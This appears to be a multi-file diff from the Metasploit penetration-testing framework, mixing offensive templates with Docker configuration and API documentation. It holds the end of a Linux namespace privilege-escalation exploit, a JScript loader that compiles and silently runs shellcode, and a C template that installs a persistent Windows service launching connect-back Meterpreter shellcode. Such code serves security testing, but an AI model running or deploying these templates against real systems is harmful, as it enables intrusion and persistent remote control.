sprintf(path, "/proc/%d/setgroups", (int)child);
|
||||
|
||||
if (write_file(path, "deny") == -1) {
|
||||
dprintf("[-] denying setgroups failed\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
dprintf("[~] done, namespace sandbox set up\n");
|
||||
|
||||
dprintf("[.] mapping subordinate ids\n");
|
||||
char subuid[64];
|
||||
char subgid[64];
|
||||
|
||||
if (get_subuid(&subuid[0], sizeof(subuid))) {
|
||||
dprintf("[-] couldn't find subuid map in /etc/subuid\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (get_subgid(&subgid[0], sizeof(subgid))) {
|
||||
dprintf("[-] couldn't find subgid map in /etc/subgid\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
dprintf("[.] subuid: %s\n", subuid);
|
||||
dprintf("[.] subgid: %s\n", subgid);
|
||||
|
||||
char cmd[256];
|
||||
|
||||
sprintf(cmd, "newuidmap %d 0 %s 1000", (int)child, subuid);
|
||||
if (system(cmd)) {
|
||||
dprintf("[-] newuidmap failed");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
sprintf(cmd, "newgidmap %d 0 %s 1000", (int)child, subgid);
|
||||
if (system(cmd)) {
|
||||
dprintf("[-] newgidmap failed");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
dprintf("[~] done, mapped subordinate ids\n");
|
||||
|
||||
dprintf("[.] executing subshell\n");
|
||||
|
||||
if (write(sync_pipe[1], "X", 1) != 1) {
|
||||
dprintf("[-] write to sock");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
int status;
|
||||
if (wait(&status) != child) {
|
||||
dprintf("[-] wait");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
Binary file not shown.
|
@ -72,5 +72,6 @@ function ShellCodeExec()
|
|||
WaitForSingleObject(hThread, 0xFFFFFFFF);
|
||||
|
||||
}
|
||||
|
||||
try{
|
||||
ShellCodeExec();
|
||||
}catch(e){}
|
||||
|
|
|
@ -141,8 +141,9 @@
|
|||
var objShell = new ActiveXObject("WScript.shell");
|
||||
var js_f = path + "\\\\<%= fname %>.js";
|
||||
var ex = path + "\\\\<%= fname %>.exe";
|
||||
var platform = "/platform:<%= arch %>";
|
||||
|
||||
objShell.run(comPath + " /out:" + ex + " " + js_f);
|
||||
objShell.run(comPath + " /out:" + ex + " " + platform + " /t:winexe "+ js_f, 0);
|
||||
while(!fso.FileExists(ex)) { }
|
||||
|
||||
objShell.run(ex, 0);
|
||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,304 @@
|
|||
#include <String.h>
|
||||
#include <Windows.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
|
||||
#define SERVICE_NAME <%= @service_name.inspect %>
|
||||
#define DISPLAY_NAME <%= @service_description.inspect %>
|
||||
#define RETRY_TIME <%= @retry_time %>
|
||||
|
||||
//
|
||||
// Globals
|
||||
//
|
||||
|
||||
SERVICE_STATUS status;
|
||||
SERVICE_STATUS_HANDLE hStatus;
|
||||
|
||||
//
|
||||
// Meterpreter connect back to host
|
||||
//
|
||||
|
||||
void start_meterpreter()
|
||||
{
|
||||
// Your meterpreter shell here
|
||||
<%= buf %>
|
||||
|
||||
LPVOID buffer = (LPVOID)VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
memcpy(buffer,buf,sizeof(buf));
|
||||
HANDLE hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)(buffer),NULL,0,NULL);
|
||||
WaitForSingleObject(hThread, -1); //INFINITE
|
||||
CloseHandle(hThread);
|
||||
}
|
||||
|
||||
//
|
||||
// Call self without parameter to start meterpreter
|
||||
//
|
||||
|
||||
void self_call()
|
||||
{
|
||||
char path[MAX_PATH];
|
||||
char cmd[MAX_PATH];
|
||||
|
||||
if (GetModuleFileName(NULL, path, sizeof(path)) == 0) {
|
||||
// Get module file name failed
|
||||
return;
|
||||
}
|
||||
|
||||
STARTUPINFO startup_info;
|
||||
PROCESS_INFORMATION process_information;
|
||||
|
||||
ZeroMemory(&startup_info, sizeof(startup_info));
|
||||
startup_info.cb = sizeof(startup_info);
|
||||
|
||||
ZeroMemory(&process_information, sizeof(process_information));
|
||||
|
||||
// If create process failed.
|
||||
// CREATE_NO_WINDOW = 0x08000000
|
||||
if (CreateProcess(path, path, NULL, NULL, TRUE, 0x08000000, NULL,
|
||||
NULL, &startup_info, &process_information) == 0)
|
||||
{
|
||||
return;
|
||||
}
|
||||
|
||||
// Wait until the process died.
|
||||
WaitForSingleObject(process_information.hProcess, -1);
|
||||
}
|
||||
|
||||
//
|
||||
// Process control requests from the Service Control Manager
|
||||
//
|
||||
|
||||
VOID WINAPI ServiceCtrlHandler(DWORD fdwControl)
|
||||
{
|
||||
switch (fdwControl) {
|
||||
case SERVICE_CONTROL_STOP:
|
||||
case SERVICE_CONTROL_SHUTDOWN:
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwCurrentState = SERVICE_STOPPED;
|
||||
break;
|
||||
|
||||
case SERVICE_CONTROL_PAUSE:
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwCurrentState = SERVICE_PAUSED;
|
||||
break;
|
||||
|
||||
case SERVICE_CONTROL_CONTINUE:
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwCurrentState = SERVICE_RUNNING;
|
||||
break;
|
||||
|
||||
default:
|
||||
break;
|
||||
}
|
||||
|
||||
if (SetServiceStatus(hStatus, &status) == 0) {
|
||||
//printf("Cannot set service status (0x%08x)", GetLastError());
|
||||
exit(1);
|
||||
}
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
|
||||
//
|
||||
// Main function of service
|
||||
//
|
||||
|
||||
VOID WINAPI ServiceMain(DWORD dwArgc, LPTSTR* lpszArgv)
|
||||
{
|
||||
// Register the service handler
|
||||
|
||||
hStatus = RegisterServiceCtrlHandler(SERVICE_NAME, ServiceCtrlHandler);
|
||||
|
||||
if (hStatus == 0) {
|
||||
//printf("Cannot register service handler (0x%08x)", GetLastError());
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Initialize the service status structure
|
||||
|
||||
status.dwServiceType = SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS;
|
||||
status.dwCurrentState = SERVICE_RUNNING;
|
||||
status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
|
||||
status.dwWin32ExitCode = 0;
|
||||
status.dwServiceSpecificExitCode = 0;
|
||||
status.dwCheckPoint = 0;
|
||||
status.dwWaitHint = 0;
|
||||
|
||||
if (SetServiceStatus(hStatus, &status) == 0) {
|
||||
//printf("Cannot set service status (0x%08x)", GetLastError());
|
||||
return;
|
||||
}
|
||||
|
||||
// Start the Meterpreter
|
||||
while (status.dwCurrentState == SERVICE_RUNNING) {
|
||||
self_call();
|
||||
Sleep(RETRY_TIME);
|
||||
}
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
|
||||
//
|
||||
// Installs and starts the Meterpreter service
|
||||
//
|
||||
|
||||
BOOL install_service()
|
||||
{
|
||||
SC_HANDLE hSCManager;
|
||||
SC_HANDLE hService;
|
||||
|
||||
char path[MAX_PATH];
|
||||
|
||||
// Get the current module name
|
||||
|
||||
if (!GetModuleFileName(NULL, path, MAX_PATH)) {
|
||||
//printf("Cannot get module name (0x%08x)", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Build the service command line
|
||||
|
||||
|
||||
char cmd[MAX_PATH];
|
||||
|
||||
int total_len = strlen(path) + <%= 3 + @start_cmd.length %>;
|
||||
if (total_len < 0 || total_len >= sizeof(cmd)){
|
||||
//printf("Cannot build service command line (0x%08x)", -1);
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
cmd[0] = '\0';
|
||||
strcat(cmd, "\"");
|
||||
strcat(cmd, path);
|
||||
strcat(cmd, "\" <%= @start_cmd %>");
|
||||
|
||||
// Open the service manager
|
||||
|
||||
hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
|
||||
|
||||
if (hSCManager == NULL) {
|
||||
//printf("Cannot open service manager (0x%08x)", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Create the service
|
||||
|
||||
hService = CreateService(
|
||||
hSCManager,
|
||||
SERVICE_NAME,
|
||||
DISPLAY_NAME,
|
||||
0xf01ff, // SERVICE_ALL_ACCESS
|
||||
SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
|
||||
SERVICE_AUTO_START,
|
||||
SERVICE_ERROR_NORMAL,
|
||||
cmd,
|
||||
NULL,
|
||||
NULL,
|
||||
NULL,
|
||||
NULL, /* LocalSystem account */
|
||||
NULL
|
||||
);
|
||||
|
||||
if (hService == NULL) {
|
||||
//printf("Cannot create service (0x%08x)", GetLastError());
|
||||
|
||||
CloseServiceHandle(hSCManager);
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Start the service
|
||||
|
||||
char* args[] = { path, "service" };
|
||||
|
||||
if (StartService(hService, 2, (const char**)&args) == 0) {
|
||||
DWORD err = GetLastError();
|
||||
|
||||
if (err != 0x420) //ERROR_SERVICE_ALREADY_RUNNING
|
||||
{
|
||||
//printf("Cannot start service %s (0x%08x)", SERVICE_NAME, err);
|
||||
|
||||
CloseServiceHandle(hService);
|
||||
CloseServiceHandle(hSCManager);
|
||||
return FALSE;
|
||||
}
|
||||
}
|
||||
|
||||
// Cleanup
|
||||
|
||||
CloseServiceHandle(hService);
|
||||
CloseServiceHandle(hSCManager);
|
||||
|
||||
//printf("Service %s successfully installed.", SERVICE_NAME);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
//
|
||||
// Start the service
|
||||
//
|
||||
|
||||
void start_service()
|
||||
{
|
||||
SERVICE_TABLE_ENTRY ServiceTable[] =
|
||||
{
|
||||
{ SERVICE_NAME, &ServiceMain },
|
||||
{ NULL, NULL }
|
||||
};
|
||||
|
||||
if (StartServiceCtrlDispatcher(ServiceTable) == 0) {
|
||||
//printf("Cannot start the service control dispatcher (0x%08x)",GetLastError());
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
//
|
||||
// Main function
|
||||
//
|
||||
|
||||
int main()
|
||||
{
|
||||
// Parse the command line argument.
|
||||
// For now, int main(int argc, char *argv) is buggy with metasm.
|
||||
// So we choose this approach to achieve it.
|
||||
LPTSTR cmdline;
|
||||
cmdline = GetCommandLine();
|
||||
|
||||
char *argv[MAX_PATH];
|
||||
char * ch = strtok(cmdline," ");
|
||||
int argc = 0;
|
||||
|
||||
while (ch != NULL)
|
||||
{
|
||||
argv[argc] = malloc( strlen(ch)+1) ;
|
||||
strncpy(argv[argc], ch, strlen(ch)+1);
|
||||
|
||||
ch = strtok (NULL, " ");
|
||||
argc++;
|
||||
}
|
||||
|
||||
if (argc > 1) {
|
||||
|
||||
if (strcmp(argv[argc-1], <%= @install_cmd.inspect %>) == 0) {
|
||||
|
||||
// Installs and starts the service
|
||||
|
||||
install_service();
|
||||
return 0;
|
||||
}
|
||||
else if (strcmp(argv[argc-1], <%= @start_cmd.inspect %>) == 0) {
|
||||
// Starts the Meterpreter as a service
|
||||
|
||||
start_service();
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
|
||||
// Starts the Meterpreter as a normal application
|
||||
|
||||
start_meterpreter();
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -252,6 +252,16 @@ typedef struct _OVERLAPPED {
|
|||
} OVERLAPPED, *LPOVERLAPPED;
|
||||
|
||||
typedef DWORD SERVICE_STATUS_HANDLE;
|
||||
typedef VOID(WINAPI *LPHANDLER_FUNCTION)(DWORD);
|
||||
|
||||
typedef void (WINAPI *LPSERVICE_MAIN_FUNCTION)(DWORD,LPSTR*);
|
||||
|
||||
typedef struct _SERVICE_TABLE_ENTRY {
|
||||
LPSTR lpServiceName;
|
||||
LPSERVICE_MAIN_FUNCTION lpServiceProc;
|
||||
} SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
|
||||
|
||||
typedef SERVICE_TABLE_ENTRY SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
|
||||
|
||||
typedef enum _SC_ENUM_TYPE {
|
||||
SC_ENUM_PROCESS_INFO = 0
|
||||
|
@ -540,3 +550,6 @@ WINAPI BOOL IsDebuggerPresent __attribute__((dllimport))(void);
|
|||
WINAPI BOOL CheckRemoteDebuggerPresent __attribute__((dllimport))(HANDLE, PBOOL);
|
||||
WINAPI NTSTATUS NtQueryInformationProcess __attribute__((dllimport))(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
|
||||
WINAPI void SetLastError __attribute__((dllimport))(DWORD);
|
||||
WINAPI SERVICE_STATUS_HANDLE RegisterServiceCtrlHandler __attribute__((dllimport))(LPCSTR, LPHANDLER_FUNCTION);
|
||||
BOOL WINAPI StartServiceCtrlDispatcher __attribute__((dllimport))(LPSERVICE_TABLE_ENTRY);
|
||||
LPTSTR WINAPI GetCommandLine __attribute__((dllimport))(void);
|
||||
|
|
|
@ -44,3 +44,5 @@ int system(const char*);
|
|||
long int labs(long int);
|
||||
div_t div(int, int);
|
||||
ldiv_t ldiv(long int, long int);
|
||||
void* malloc (size_t size);
|
||||
|
||||
|
|
|
@ -22,4 +22,4 @@ xMMMMMMMMMd ,0MMMMMMMMMMK;
|
|||
%red 'oOWMMMMMMMMo%clr +:+
|
||||
%red .,cdkO0K;%clr :+: :+:
|
||||
:::::::+:
|
||||
%whiMetasploit%clr %yelUnder Construction%clr
|
||||
%whiMetasploit%clr
|
Binary file not shown.
File diff suppressed because it is too large
Load Diff
|
@ -16,6 +16,7 @@ bin
|
|||
checkfs
|
||||
checkfsys
|
||||
checksys
|
||||
chronos
|
||||
cmwlogin
|
||||
couchdb
|
||||
daemon
|
||||
|
|
File diff suppressed because one or more lines are too long
File diff suppressed because it is too large
Load Diff
|
@ -9,6 +9,6 @@ services:
|
|||
BUNDLER_ARGS: --jobs=8
|
||||
image: metasploit:dev
|
||||
environment:
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf_dev
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf_dev?pool=200&timeout=5
|
||||
volumes:
|
||||
- .:/usr/src/metasploit-framework
|
||||
|
|
|
@ -3,14 +3,13 @@ services:
|
|||
ms:
|
||||
image: metasploitframework/metasploit-framework:latest
|
||||
environment:
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf
|
||||
DATABASE_URL: postgres://postgres@db:5432/msf?pool=200&timeout=5
|
||||
links:
|
||||
- db
|
||||
ports:
|
||||
- 4444:4444
|
||||
volumes:
|
||||
- $HOME/.msf4:/home/msf/.msf4
|
||||
- /etc/localtime:/etc/localtime:ro
|
||||
|
||||
db:
|
||||
image: postgres:10-alpine
|
||||
|
|
|
@ -0,0 +1,5 @@
|
|||
development: &pgsql
|
||||
url: <%= ENV['DATABASE_URL'] %>
|
||||
|
||||
production: &production
|
||||
<<: *pgsql
|
|
@ -5,16 +5,27 @@ MSF_GROUP=msf
|
|||
TMP=${MSF_UID:=1000}
|
||||
TMP=${MSF_GID:=1000}
|
||||
|
||||
# don't recreate system users like root
|
||||
if [ "$MSF_UID" -lt "1000" ]; then
|
||||
MSF_UID=1000
|
||||
# if the user starts the container as root or another system user,
|
||||
# don't use a low privileged user as we mount the home directory
|
||||
if [ "$MSF_UID" -eq "0" ]; then
|
||||
"$@"
|
||||
else
|
||||
# if the users group already exists, create a random GID, otherwise
|
||||
# reuse it
|
||||
if ! grep ":$MSF_GID:" /etc/group > /dev/null; then
|
||||
addgroup -g $MSF_GID $MSF_GROUP
|
||||
else
|
||||
addgroup $MSF_GROUP
|
||||
fi
|
||||
|
||||
# check if user id already exists
|
||||
if ! grep ":$MSF_UID:" /etc/passwd > /dev/null; then
|
||||
adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
|
||||
# add user to metasploit group so it can read the source
|
||||
addgroup $MSF_USER $METASPLOIT_GROUP
|
||||
su-exec $MSF_USER "$@"
|
||||
# fall back to root exec if the user id already exists
|
||||
else
|
||||
"$@"
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ "$MSF_GID" -lt "1000" ]; then
|
||||
MSF_GID=1000
|
||||
fi
|
||||
|
||||
addgroup -g $MSF_GID $MSF_GROUP
|
||||
adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
|
||||
|
||||
su-exec $MSF_USER "$@"
|
||||
|
|
|
@ -15,26 +15,21 @@ module AuthApiDoc
|
|||
end
|
||||
|
||||
swagger_path '/api/v1/auth/generate-token' do
|
||||
# Swagger documentation for /api/v1/auth/generate-token GET
|
||||
operation :get do
|
||||
# Swagger documentation for /api/v1/auth/generate-token POST
|
||||
operation :post do
|
||||
|
||||
key :description, 'Return a valid Authorization Bearer token.'
|
||||
key :tags, [ 'auth' ]
|
||||
|
||||
parameter do
|
||||
key :name, :username
|
||||
key :in, :query
|
||||
key :description, 'The username for the user you want to authenticate.'
|
||||
key :in, :body
|
||||
key :name, :body
|
||||
key :description, 'Login credentials for the user who will be generating a token.'
|
||||
key :required, true
|
||||
key :type, :string
|
||||
end
|
||||
|
||||
parameter do
|
||||
key :name, :password
|
||||
key :in, :query
|
||||
key :description, 'The password for the user you want to authenticate.'
|
||||
key :required, true
|
||||
key :type, :string
|
||||
schema do
|
||||
property :username, type: :string, required: true
|
||||
property :password, type: :string, required: true
|
||||
end
|
||||
end
|
||||
|
||||
response 200 do
|
||||
|
|
|
@ -33,6 +33,11 @@ module CredentialApiDoc
|
|||
DATA_EXAMPLE = "'password123', '$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1', or '$NT$7f8fe03093cc84b267b109625f6bbf4b'"
|
||||
JTR_FORMAT_DESC = 'Comma-separated list of the formats for John the ripper to use to try and crack this.'
|
||||
JTR_FORMAT_EXAMPLE = 'md5,des,bsdi,crypt'
|
||||
KEY_DESC = 'The name of the key for the realm.'
|
||||
KEY_EXAMPLE = 'Active Directory Domain'
|
||||
VALUE_DESC = 'The value of the key for the realm.'
|
||||
VALUE_EXAMPLE = 'contoso.com'
|
||||
|
||||
PUBLIC_TYPE_ENUM = [ 'Metasploit::Credential::BlankUsername', 'Metasploit::Credential::Username' ]
|
||||
PRIVATE_TYPE_CLASS_ENUM = [
|
||||
'Metasploit::Credential::ReplayableHash',
|
||||
|
@ -108,6 +113,15 @@ module CredentialApiDoc
|
|||
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
|
||||
end
|
||||
|
||||
swagger_schema :Realm do
|
||||
key :required, [:key, :value]
|
||||
property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
|
||||
property :key, type: :string, description: KEY_DESC, example: KEY_EXAMPLE
|
||||
property :value, type: :string, description: VALUE_DESC, example: VALUE_EXAMPLE
|
||||
property :created_at, type: :string, format: :date_time, description: RootApiDoc::CREATED_AT_DESC
|
||||
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
|
||||
end
|
||||
|
||||
swagger_path '/api/v1/credentials' do
|
||||
# Swagger documentation for /api/v1/credentials GET
|
||||
operation :get do
|
||||
|
@ -197,6 +211,8 @@ module CredentialApiDoc
|
|||
property :username, type: :string, description: USERNAME_DESC, example: USERNAME_EXAMPLE
|
||||
property :private_data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
|
||||
property :private_type, type: :string, description: PRIVATE_TYPE_DESC, enum: PRIVATE_TYPE_ENUM
|
||||
property :realm_key, type: :string, description: KEY_DESC, enum: PRIVATE_TYPE_ENUM
|
||||
property :realm_value, type: :string, description: VALUE_DESC, enum: PRIVATE_TYPE_ENUM
|
||||
property :jtr_format, type: :string, description: JTR_FORMAT_DESC, example: JTR_FORMAT_EXAMPLE
|
||||
property :address, type: :string, format: :ipv4, required: true, description: ADDRESS_DESC, example: ADDRESS_EXAMPLE
|
||||
property :port, type: :int32, format: :int32, description: PORT_DESC, example: PORT_EXAMPLE
|
||||
|
@ -312,7 +328,7 @@ module CredentialApiDoc
|
|||
|
||||
#Swagger documentation for /api/v1/credentials/:id PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing credential.'
|
||||
key :description, 'Update the attributes on an existing credential.'
|
||||
key :tags, [ 'credential' ]
|
||||
|
||||
parameter :update_id
|
||||
|
|
|
@ -10,7 +10,7 @@ module EventApiDoc
|
|||
SEEN_DESC = 'true if a user has acknowledged the event.'
|
||||
USERNAME_DESC = 'Name of the user that triggered the event.'
|
||||
INFO_DESC = 'Information about the event specific to the event name.'
|
||||
INFO_EXAMPLE = '{:command=>"irb"}'
|
||||
INFO_EXAMPLE = {command: 'irb'}
|
||||
|
||||
# Swagger documentation for Event model
|
||||
swagger_schema :Event do
|
||||
|
@ -27,6 +27,69 @@ module EventApiDoc
|
|||
end
|
||||
|
||||
swagger_path '/api/v1/events' do
|
||||
# Swagger documentation for /api/v1/events GET
|
||||
operation :get do
|
||||
key :description, 'Return events that are stored in the database.'
|
||||
key :tags, [ 'event' ]
|
||||
|
||||
parameter :workspace
|
||||
|
||||
parameter do
|
||||
key :name, :limit
|
||||
key :in, :query
|
||||
key :description, RootApiDoc::LIMIT_DESC
|
||||
key :example, RootApiDoc::LIMIT_DEFAULT
|
||||
key :type, :integer
|
||||
key :format, :int32
|
||||
key :required, false
|
||||
end
|
||||
|
||||
parameter do
|
||||
key :name, :offset
|
||||
key :in, :query
|
||||
key :description, RootApiDoc::OFFSET_DESC
|
||||
key :example, RootApiDoc::OFFSET_DEFAULT
|
||||
key :type, :integer
|
||||
key :format, :int32
|
||||
key :required, false
|
||||
end
|
||||
|
||||
parameter do
|
||||
key :name, :order
|
||||
key :in, :query
|
||||
key :description, RootApiDoc::ORDER_DESC
|
||||
key :type, :string
|
||||
key :required, false
|
||||
key :enum, RootApiDoc::ORDER_ENUM
|
||||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Returns event data.'
|
||||
schema do
|
||||
property :data do
|
||||
key :type, :array
|
||||
items do
|
||||
key :'$ref', :Event
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Swagger documentation for /api/v1/events POST
|
||||
operation :post do
|
||||
key :description, 'Create an event.'
|
||||
|
@ -71,4 +134,44 @@ module EventApiDoc
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
swagger_path '/api/v1/events/{id}' do
|
||||
# Swagger documentation for /api/v1/events/:id GET
|
||||
operation :get do
|
||||
key :description, 'Return a specific event that is stored in the database.'
|
||||
key :tags, [ 'event' ]
|
||||
|
||||
parameter do
|
||||
key :name, :id
|
||||
key :in, :path
|
||||
key :description, 'ID of event to retrieve.'
|
||||
key :required, true
|
||||
key :type, :integer
|
||||
key :format, :int32
|
||||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Returns event data.'
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Event
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -266,7 +266,7 @@ module HostApiDoc
|
|||
|
||||
# Swagger documentation for /api/v1/hosts/:id PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing host.'
|
||||
key :description, 'Update the attributes on an existing host.'
|
||||
key :tags, [ 'host' ]
|
||||
|
||||
parameter :update_id
|
||||
|
|
|
@ -153,7 +153,7 @@ module LoginApiDoc
|
|||
end
|
||||
|
||||
swagger_path '/api/v1/logins/{id}' do
|
||||
# Swagger documentation for api/v1/logins/:id GET
|
||||
# Swagger documentation for /api/v1/logins/:id GET
|
||||
operation :get do
|
||||
key :description, 'Return specific login that is stored in the database.'
|
||||
key :tags, [ 'login' ]
|
||||
|
@ -193,7 +193,7 @@ module LoginApiDoc
|
|||
|
||||
# Swagger documentation for /api/v1/logins/:id PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing login.'
|
||||
key :description, 'Update the attributes on an existing login.'
|
||||
key :tags, [ 'login' ]
|
||||
|
||||
parameter :update_id
|
||||
|
|
|
@ -10,7 +10,8 @@ module LootApiDoc
|
|||
LTYPE_EXAMPLE = "'file', 'image', 'config_file', etc."
|
||||
PATH_DESC = 'The on-disk path to the loot file.'
|
||||
PATH_EXAMPLE = '/path/to/file.txt'
|
||||
DATA_DESC = 'The contents of the file.'
|
||||
DATA_DESC = "Base64 encoded copy of the file's contents."
|
||||
DATA_EXAMPLE = 'dGhpcyBpcyB0aGUgZmlsZSdzIGNvbnRlbnRz'
|
||||
CONTENT_TYPE_DESC = 'The mime/content type of the file at {#path}. Used to server the file correctly so browsers understand whether to render or download the file.'
|
||||
CONTENT_TYPE_EXAMPLE = 'text/plain'
|
||||
NAME_DESC = 'The name of the loot.'
|
||||
|
@ -18,6 +19,9 @@ module LootApiDoc
|
|||
INFO_DESC = 'Information about the loot.'
|
||||
MODULE_RUN_ID_DESC = 'The ID of the module run record this loot is associated with.'
|
||||
|
||||
# Some of the attributes expect different data when doing a create.
|
||||
CREATE_PATH_DESC = 'The name to give the file on the server. All files are stored in a server configured path, so a full path is not needed. If there is a corresponding file on disk, the given value will be prepended with a unique string to prevent accidental overwrites of other files.'
|
||||
CREATE_PATH_EXAMPLE = 'password_file.txt'
|
||||
|
||||
# Swagger documentation for loot model
|
||||
swagger_schema :Loot do
|
||||
|
@ -28,7 +32,7 @@ module LootApiDoc
|
|||
property :service_id, type: :integer, format: :int32, description: SERVICE_ID_DESC
|
||||
property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE
|
||||
property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE
|
||||
property :data, type: :string, description: DATA_DESC
|
||||
property :data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
|
||||
property :content_type, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
|
||||
property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE
|
||||
property :info, type: :string, description: INFO_DESC
|
||||
|
@ -87,8 +91,8 @@ module LootApiDoc
|
|||
property :host, type: :string, format: :ipv4, description: HOST_DESC, example: RootApiDoc::HOST_EXAMPLE
|
||||
property :service, '$ref': :Service
|
||||
property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE, required: true
|
||||
property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE, required: true
|
||||
property :data, type: :string, description: DATA_DESC
|
||||
property :path, type: :string, description: CREATE_PATH_DESC, example: CREATE_PATH_EXAMPLE, required: true
|
||||
property :data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
|
||||
property :ctype, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
|
||||
property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE, required: true
|
||||
property :info, type: :string, description: INFO_DESC
|
||||
|
@ -195,7 +199,7 @@ module LootApiDoc
|
|||
|
||||
# Swagger documentation for /api/v1/loots/{id} PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing loot.'
|
||||
key :description, 'Update the attributes on an existing loot.'
|
||||
key :tags, [ 'loot' ]
|
||||
|
||||
parameter :update_id
|
||||
|
@ -206,7 +210,14 @@ module LootApiDoc
|
|||
key :description, 'The updated attributes to overwrite to the loot.'
|
||||
key :required, true
|
||||
schema do
|
||||
key :'$ref', :Loot
|
||||
property :workspace, type: :string, required: true, description: RootApiDoc::WORKSPACE_POST_DESC, example: RootApiDoc::WORKSPACE_POST_EXAMPLE
|
||||
property :host_id, type: :integer, format: :int32, description: HOST_ID_DESC
|
||||
property :service_id, type: :integer, format: :int32, description: SERVICE_ID_DESC
|
||||
property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE, required: true
|
||||
property :path, type: :string, description: CREATE_PATH_DESC, example: CREATE_PATH_EXAMPLE, required: true
|
||||
property :ctype, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
|
||||
property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE, required: true
|
||||
property :info, type: :string, description: INFO_DESC
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -184,7 +184,7 @@ module NoteApiDoc
|
|||
|
||||
# Swagger documentation for /api/v1/notes/:id PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing note.'
|
||||
key :description, 'Update the attributes on an existing note.'
|
||||
key :tags, [ 'note' ]
|
||||
|
||||
parameter :update_id
|
||||
|
|
|
@ -17,6 +17,15 @@ module RootApiDoc
|
|||
AUTH_CODE_DESC = 'The authentication error code that was generated.'
|
||||
AUTH_CODE_EXAMPLE = 401
|
||||
